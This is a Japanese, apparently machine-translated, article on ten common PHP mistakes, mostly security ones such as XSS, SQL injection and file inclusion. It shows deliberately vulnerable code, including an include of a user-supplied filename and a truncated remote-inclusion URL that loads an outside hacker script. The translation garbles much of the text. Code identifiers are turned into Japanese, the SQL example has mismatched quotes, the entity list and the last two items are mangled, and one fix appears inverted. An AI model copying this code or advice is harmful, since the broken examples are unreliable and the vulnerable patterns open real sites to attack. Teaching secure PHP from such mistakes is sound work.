PHP は優れた Web 開発言語であり、柔軟な言語ですが、PHP プログラマーが何度も犯す間違いがいくつかあります。私は、PHP プログラマーが犯しやすい 10 個の間違いのリストを以下に作成しました。そのほとんどはセキュリティに関連しています。どのような間違いを犯したかを確認してください。
1. HTML エンティティを無視しないでください。
基本的な常識: すべての信頼できない入力 (特にユーザーがフォームから送信したデータ) は出力前に変更する必要があります。
echo $_GET['usename'] ;
この例では次の出力が得られます。
<script>/*管理者パスワードを変更または Cookie を設定するスクリプト*/</script>
ユーザーが正しく入力していることを確認しない限り、これは明らかなセキュリティ リスクです。
修正方法:
「<」、「>」、「and」などを正しい HTML 表現 (<、>'、および ") に変換する必要があります。関数 htmlspecialchars および htmlentities() がまさにこれを行います。
正しいメソッド: echo htmlspecialchars ( $_GET['username'], ENT_QUOTES);
2. SQL 入力を無視しないでください。私は以前、「SQL インジェクションを防ぐ最も簡単な方法 (php+mysql)」という記事でこの問題について説明し、ある人が次のような簡単な方法を教えてくれました。 php.ini で magic_quotes がすでに On に設定されているため、これについて心配する必要はありませんが、すべての入力が $_GET、$_POST、または $_COOKIE から来ているわけではありません
。
SQL インジェクションを防ぐ最も簡単な方法 (php+mysql) と同様に、
mysql_real_escape_string() 関数を使用する正しい方法をお勧めします。
<?php
$sql = “ユーザー設定を更新します
name='.mysql_real_escape_string($name).'
WHERE id='.mysql_real_escape_string ($id).'";
mysql_query($sql);
?>
3. HTTP ヘッダー関連関数の間違った使用: header()、session_start()、setcookie()
この警告に遭遇したことがありますか?」 警告: ヘッダー情報を追加できません - ヘッダーはすでに送信されました [....]
Web ページがサーバーからダウンロードされるたびに、サーバーの出力はヘッダーと本文の 2 つの部分に分割されます。
ヘッダーには、Cookie などの非視覚的なデータが含まれています。常に頭が最初に到着します。テキスト部分には、ビジュアル HTML、画像、その他のデータが含まれます。
Output_buffering が Off に設定されている場合、出力がある前にすべての HTTP ヘッダー関連関数を呼び出す必要があります。問題は、ある環境で開発し、別の環境にデプロイすると、output_buffering 設定が異なる可能性があることです。その結果、リダイレクトが停止し、Cookie とセッションが正しく設定されませんでした...
修正方法:
出力する前に必ず http ヘッダー関連の関数を呼び出し、output_buffering = Off に設定してください。
。
4. Require ファイルまたは include ファイルでは安全でないデータが使用されます。自分で明示的に宣言していないデータは信頼しないでください。 $_GET、$_POST、または $_COOKIE から取得したファイルを含めたり、要求したりしないでください。
例えば:
インデックス.php
<?
//ヘッダー、設定、データベース接続などを含む
include($_GET['ファイル名']);
//フッターを含む
?>
すべてのハッカーが http://www.yourdomain.com/index.php?filename=anyfile.txt を使用できるようになりました。
機密情報を取得するか、PHP スクリプトを実行します。
allow_url_fopen=On の場合、あなたは死んでいます:
次の入力を試してください。
http://www.yourdomain.com/index . … n.com%2Fphphack.php
これで、ハッカーはスパムを送信したり、パスワードを変更したりすることができます。削除されたファイルなど想像できるものなら何でも。
修正方法:
どのファイルを include ディレクティブまたは require ディレクティブに含めることができるかを制御する必要があります。
ここでは、簡単ではありますが、包括的な回避策を示します。
<?
//許可されたファイルのみを含めます。
$allowedFiles = array('file1.txt','file2.txt','file3.txt');
if(in_array((string)$_GET['filename'],$allowedFiles)) {
include($_GET['ファイル名']);
}
それ以外{
exit('許可されません');
}
?>
5. 文法上の誤り 文法上の誤りには、非常に一般的なため、ここにリストしなければならないすべての語彙および文法上の誤りが含まれます。解決策は、PHP の構文を注意深く研究し、括弧、中括弧、セミコロン、または引用符を見逃さないように注意することです。また、メモ帳は使用せずに、適切なエディタを見つけてください。
6. オブジェクト指向プロジェクトはほとんどまたはまったく使用されません。多くのプロジェクトでは PHP のオブジェクト指向テクノロジが使用されないため、コードのメンテナンスに非常に時間がかかり、労力がかかります。 PHP はますます多くのオブジェクト指向テクノロジをサポートしており、ますます改良されています。オブジェクト指向テクノロジを使用しない理由はありません。
7. フレームワークを使用しない
PHP プロジェクトの 95% は、作成、編集、リスト、削除という同じ 4 つのことを実行しています。これらの 4 つのことを実行するのに役立つ MVC フレームワークが多数あります。なぜそれらを使用しないのでしょうか。
8. PHP ですでに利用可能な機能を知らない
PHP のコアには多くの関数が含まれています。多くのプログラマーは何度も車輪の再発明を繰り返します。多くの時間が無駄になりました。コーディングする前に PHP mamual を検索して Google で検索すると新しい発見があるかもしれません。 PHP の exec() は、cmd シェルを実行し、実行結果の最後の行を文字列の形式で返すことができる強力な関数です。セキュリティ上の理由から、EscapeShellCmd() 9 を使用できます
。古いバージョンの PHP を使用してください。
多くのプログラマーは依然として PHP4 を使用しています。PHP4 での開発では PHP の可能性を最大限に活用できず、セキュリティ上のリスクが依然として存在します。 PHP5 に切り替えるには、それほど手間はかかりません。ほとんどの PHP4 プログラムは、ステートメントをほとんど変更せずに、またはまったく変更せずに PHP5 に移行できます。 http://www.nexen.net の調査によると、 PHP サーバーの 12% だけが PHP5 を使用しているため、PHP 開発者の 88% は依然として PHP4 を使用しています。
10. Web 内で引用符「'」を 2 回変更します。ページ '"? これは通常、開発者の環境では magic_quotes がオフに設定されているのに、デプロイされたサーバーでは magic_quotes=on になっていることが原因です。PHP は GET、POST、COOKIE のデータに対して addlashes() を繰り返し実行します。
原文:
これは文字列
マジッククオートです:
それは文字列です
もう一度実行します
ラッシュを追加():
これは文字列の
HTML 出力です。
の
状況は、ユーザーが最初に間違ったログイン情報を入力した場合です。サーバーが間違った入力を検出すると、同じフォームが出力され、ユーザーに再入力が要求され、ユーザーの入力が 2 回変更されます。